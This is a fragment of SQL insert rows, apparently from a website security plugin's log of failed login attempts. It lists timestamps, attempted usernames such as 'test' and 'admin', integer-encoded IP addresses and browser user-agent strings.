(99072, 1492464310.353534, 1, 'loginFailInvalidUsername', 'test', 0, 3159789393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99070, 1492462552.096937, 1, 'loginFailInvalidUsername', 'test', 0, 3419821096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99069, 1492461969.772244, 1, 'loginFailInvalidUsername', 'test', 0, 39334595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99068, 1492461968.685678, 1, 'loginFailInvalidUsername', 'test', 0, 39334595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99067, 1492458376.782817, 1, 'loginFailInvalidUsername', 'test', 0, 778261762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99066, 1492458375.729174, 1, 'loginFailInvalidUsername', 'test', 0, 778261762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99065, 1492458247.087990, 1, 'loginFailInvalidUsername', 'test', 0, 3574689614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99064, 1492458246.128961, 1, 'loginFailInvalidUsername', 'test', 0, 3574689614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99063, 1492456971.758008, 1, 'loginFailInvalidUsername', 'test', 0, 1979102065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99062, 1492456969.289684, 1, 'loginFailInvalidUsername', 'test', 0, 1979102065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99061, 1492456156.530750, 1, 'loginFailInvalidUsername', 'test', 0, 1659124010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99060, 1492454875.803320, 1, 'loginFailInvalidUsername', 'test', 0, 1547635932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99059, 1492454874.729340, 1, 'loginFailInvalidUsername', 'test', 0, 1547635932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99058, 1492454172.231823, 1, 'loginFailInvalidUsername', 'test', 0, 1405594119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99057, 1492454171.309568, 1, 'loginFailInvalidUsername', 'test', 0, 1405594119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99056, 1492451419.804913, 1, 'loginFailInvalidUsername', 'test', 0, 3536059489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99055, 1492451418.110265, 1, 'loginFailInvalidUsername', 'test', 0, 3536059489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99054, 1492449250.283931, 1, 'loginFailInvalidUsername', 'test', 0, 3016151415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99053, 1492449248.233563, 1, 'loginFailInvalidUsername', 'test', 0, 3016151415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99052, 1492449038.649001, 1, 'loginFailInvalidUsername', 'test', 0, 1589497003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99051, 1492449037.461825, 1, 'loginFailInvalidUsername', 'test', 0, 1589497003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99050, 1492448046.359765, 1, 'loginFailInvalidUsername', 'test', 0, 1392362811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99049, 1492448045.430555, 1, 'loginFailInvalidUsername', 'test', 0, 1392362811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99048, 1492447409.734878, 1, 'loginFailInvalidUsername', 'test', 0, 1379084173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99047, 1492447407.986764, 1, 'loginFailInvalidUsername', 'test', 0, 1379084173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99046, 1492444859.475864, 1, 'loginFailInvalidUsername', 'test', 0, 1605635691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99045, 1492444647.752180, 1, 'loginFailInvalidUsername', 'test', 0, 1552930855, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99044, 1492444646.766899, 1, 'loginFailInvalidUsername', 'test', 0, 1552930855, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99043, 1492443650.335870, 1, 'loginFailInvalidUsername', 'test', 0, 694592633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99042, 1492443649.200151, 1, 'loginFailInvalidUsername', 'test', 0, 694592633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99041, 1492442452.560003, 1, 'loginFailInvalidUsername', 'test', 0, 1840681748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99040, 1492442451.574835, 1, 'loginFailInvalidUsername', 'test', 0, 1840681748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99039, 1492441333.830586, 1, 'loginFailInvalidUsername', 'test', 0, 2537443566, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99038, 1492440946.348958, 1, 'loginFailInvalidUsername', 'test', 0, 3144934315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99037, 1492440944.969344, 1, 'loginFailInvalidUsername', 'test', 0, 3144934315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99036, 1492440490.266667, 1, 'loginFailInvalidUsername', 'test', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99035, 1492440489.188882, 1, 'loginFailInvalidUsername', 'test', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99034, 1492440453.622861, 1, 'loginFailInvalidUsername', 'test', 0, 86369906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99033, 1492440451.917973, 1, 'loginFailInvalidUsername', 'test', 0, 86369906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99032, 1492439406.754473, 1, 'loginFailInvalidUsername', 'test', 0, 1768869012, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99031, 1492436051.263336, 1, 'loginFailInvalidUsername', 'test', 0, 39580259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99030, 1492436050.154445, 1, 'loginFailInvalidUsername', 'test', 0, 39580259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99029, 1492433471.181095, 1, 'loginFailInvalidUsername', 'test', 0, 737893407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99028, 1492433469.764543, 1, 'loginFailInvalidUsername', 'test', 0, 737893407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99027, 1492430707.233486, 1, 'loginFailInvalidUsername', 'test', 0, 979498369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99026, 1492430705.292263, 1, 'loginFailInvalidUsername', 'test', 0, 979498369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99025, 1492426556.454159, 1, 'loginFailInvalidUsername', 'test', 0, 1416403101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99024, 1492426555.382154, 1, 'loginFailInvalidUsername', 'test', 0, 1416403101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99023, 1492426386.807316, 1, 'loginFailInvalidUsername', 'test', 0, 635762866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99022, 1492426385.805035, 1, 'loginFailInvalidUsername', 'test', 0, 635762866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99021, 1492423729.884693, 1, 'loginFailInvalidUsername', 'test', 0, 2982956000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99020, 1492423698.838885, 1, 'loginFailInvalidUsername', 'test', 0, 86607465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99019, 1492420453.942509, 1, 'loginFailInvalidUsername', 'test', 0, 1407362711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99018, 1492420452.949161, 1, 'loginFailInvalidUsername', 'test', 0, 1407362711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99017, 1492415875.621951, 1, 'loginFailInvalidUsername', 'test', 0, 1539009069, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99016, 1492415874.602261, 1, 'loginFailInvalidUsername', 'test', 0, 1539009069, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99015, 1492415874.259716, 1, 'loginFailInvalidUsername', 'test', 0, 1022582567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99014, 1492415873.051512, 1, 'loginFailInvalidUsername', 'test', 0, 1022582567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99013, 1492410570.055144, 1, 'loginFailInvalidUsername', 'test', 0, 2984576065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99012, 1492410568.774891, 1, 'loginFailInvalidUsername', 'test', 0, 2984576065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99011, 1492409691.354469, 1, 'loginFailInvalidUsername', 'test', 0, 3126060520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99010, 1492409690.125768, 1, 'loginFailInvalidUsername', 'test', 0, 3126060520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99009, 1492408830.132073, 1, 'loginFailInvalidUsername', 'test', 0, 520785588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99008, 1492408829.140826, 1, 'loginFailInvalidUsername', 'test', 0, 520785588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99007, 1492406900.016585, 1, 'loginFailInvalidUsername', 'test', 0, 1603163213, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99006, 1492406897.483079, 1, 'loginFailInvalidUsername', 'test', 0, 1603163213, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99005, 1492405132.915170, 1, 'loginFailInvalidUsername', 'test', 0, 1598817237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99004, 1492405131.904642, 1, 'loginFailInvalidUsername', 'test', 0, 1598817237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99003, 1492396428.488859, 1, 'loginFailInvalidUsername', 'test', 0, 1249533309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99002, 1492396427.084948, 1, 'loginFailInvalidUsername', 'test', 0, 1249533309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99001, 1492383354.177347, 1, 'loginFailInvalidUsername', 'test', 0, 657474792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99000, 1492383352.994905, 1, 'loginFailInvalidUsername', 'test', 0, 657474792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98999, 1492382324.543246, 1, 'loginFailInvalidUsername', 'test', 0, 3392086306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98998, 1492382323.276942, 1, 'loginFailInvalidUsername', 'test', 0, 3392086306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98997, 1492376811.937722, 1, 'loginFailInvalidUsername', 'test', 0, 3355999165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98996, 1492376806.512096, 1, 'loginFailInvalidUsername', 'test', 0, 3355999165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98995, 1492374182.133835, 1, 'loginFailValidUsername', 'julie', 2, 1958862038, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98994, 1492372720.513808, 1, 'loginFailInvalidUsername', 'test', 0, 657083502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98993, 1492372709.274517, 1, 'loginFailInvalidUsername', 'test', 0, 657083502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98992, 1492372682.926447, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98991, 1492372682.607868, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98989, 1492372681.969565, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98990, 1492372682.290295, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98988, 1492372681.651383, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98987, 1492372681.333381, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98986, 1492372681.015471, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98985, 1492372680.696084, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98984, 1492372680.376438, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98983, 1492372680.056354, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98982, 1492372679.736403, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98981, 1492372679.418574, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98980, 1492372679.101017, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98979, 1492372678.770914, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98978, 1492372678.453892, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98977, 1492372678.123081, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98976, 1492372677.793998, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98975, 1492372677.472911, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98974, 1492372677.153830, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98973, 1492371566.853451, 1, 'loginFailInvalidUsername', 'test', 0, 1545960047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98972, 1492371565.580215, 1, 'loginFailInvalidUsername', 'test', 0, 1545960047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98971, 1492368592.246942, 1, 'loginFailInvalidUsername', 'test', 0, 1834833882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98970, 1492368591.188307, 1, 'loginFailInvalidUsername', 'test', 0, 1834833882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98969, 1492368453.991124, 1, 'loginFailInvalidUsername', 'test', 0, 850014883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98968, 1492368452.715296, 1, 'loginFailInvalidUsername', 'test', 0, 850014883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98967, 1492365095.351315, 1, 'loginFailInvalidUsername', 'test', 0, 1729910275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98966, 1492365093.977786, 1, 'loginFailInvalidUsername', 'test', 0, 1729910275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98965, 1492364085.865056, 1, 'loginFailInvalidUsername', 'test', 0, 3120978290, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98964, 1492361461.551876, 1, 'loginFailInvalidUsername', 'test', 0, 2872169923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98963, 1492361460.317176, 1, 'loginFailInvalidUsername', 'test', 0, 2872169923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98962, 1492361122.392773, 1, 'loginFailInvalidUsername', 'test', 0, 1186983720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98961, 1492361121.197061, 1, 'loginFailInvalidUsername', 'test', 0, 1186983720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98960, 1492361021.044272, 1, 'loginFailInvalidUsername', 'test', 0, 697060593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98959, 1492361019.703205, 1, 'loginFailInvalidUsername', 'test', 0, 697060593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98958, 1492359198.615688, 1, 'loginFailInvalidUsername', 'test', 0, 1327449813, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98957, 1492356116.692406, 1, 'loginFailValidUsername', 'julie', 2, 1833643342, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98956, 1492353083.814969, 1, 'loginFailInvalidUsername', 'test', 0, 1160255037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98955, 1492353080.511564, 1, 'loginFailInvalidUsername', 'test', 0, 1160255037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98954, 1492351084.280742, 1, 'loginFailInvalidUsername', 'test', 0, 3170695288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98953, 1492351082.948421, 1, 'loginFailInvalidUsername', 'test', 0, 3170695288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98952, 1492350028.996295, 1, 'loginFailInvalidUsername', 'test', 0, 1523791963, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98951, 1492350028.019961, 1, 'loginFailInvalidUsername', 'test', 0, 1523791963, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98950, 1492348620.088059, 1, 'loginFailInvalidUsername', 'test', 0, 2969824596, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98949, 1492348618.308176, 1, 'loginFailInvalidUsername', 'test', 0, 2969824596, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98948, 1492347933.988071, 1, 'loginFailInvalidUsername', 'test', 0, 2050351307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98947, 1492346165.832197, 1, 'loginFailInvalidUsername', 'test', 0, 1504707797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98946, 1492346164.873923, 1, 'loginFailInvalidUsername', 'test', 0, 1504707797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98945, 1492345216.458420, 1, 'loginFailInvalidUsername', 'test', 0, 1546989467, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98944, 1492342801.130664, 1, 'loginFailInvalidUsername', 'test', 0, 1832987732, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98943, 1492342799.089129, 1, 'loginFailInvalidUsername', 'test', 0, 1832987732, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98942, 1492340505.744288, 1, 'loginFailInvalidUsername', 'test', 0, 1308677291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98941, 1492338920.096647, 1, 'loginFailInvalidUsername', 'test', 0, 3394689422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98940, 1492338918.748659, 1, 'loginFailInvalidUsername', 'test', 0, 3394689422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98939, 1492338485.551778, 1, 'loginFailInvalidUsername', 'test', 0, 694691779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98938, 1492338484.344586, 1, 'loginFailInvalidUsername', 'test', 0, 694691779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98937, 1492337472.532804, 1, 'loginFailInvalidUsername', 'test', 0, 625844236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98936, 1492336084.105501, 1, 'loginFailValidUsername', 'julie', 2, 2972118216, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98935, 1492334559.664208, 1, 'loginFailInvalidUsername', 'test', 0, 763203023, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98934, 1492334557.391679, 1, 'loginFailInvalidUsername', 'test', 0, 763203023, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98933, 1492329074.483295, 1, 'loginFailInvalidUsername', 'test', 0, 1394319284, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98932, 1492329073.299996, 1, 'loginFailInvalidUsername', 'test', 0, 1394319284, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98931, 1492327647.031546, 1, 'loginFailInvalidUsername', 'test', 0, 2057822968, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98930, 1492327306.491397, 1, 'loginFailValidUsername', 'julie', 2, 3563927549, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98929, 1492326514.319933, 1, 'loginFailInvalidUsername', 'test', 0, 609307862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98928, 1492326511.969168, 1, 'loginFailInvalidUsername', 'test', 0, 609307862, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98927, 1492323165.226090, 1, 'loginFailInvalidUsername', 'test', 0, 657201404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98926, 1492323164.042124, 1, 'loginFailInvalidUsername', 'test', 0, 657201404, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98925, 1492322734.487120, 1, 'loginFailInvalidUsername', 'test', 0, 2344738454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98924, 1492322731.194180, 1, 'loginFailInvalidUsername', 'test', 0, 2344738454, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98923, 1492321361.309771, 1, 'loginFailInvalidUsername', 'test', 0, 3758090141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98922, 1492321357.367115, 1, 'loginFailInvalidUsername', 'test', 0, 3758090141, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98921, 1492309119.270306, 1, 'loginFailInvalidUsername', 'test', 0, 621540623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98920, 1492309118.270323, 1, 'loginFailInvalidUsername', 'test', 0, 621540623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98919, 1492308284.873251, 1, 'loginFailInvalidUsername', 'test', 0, 1855915268, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
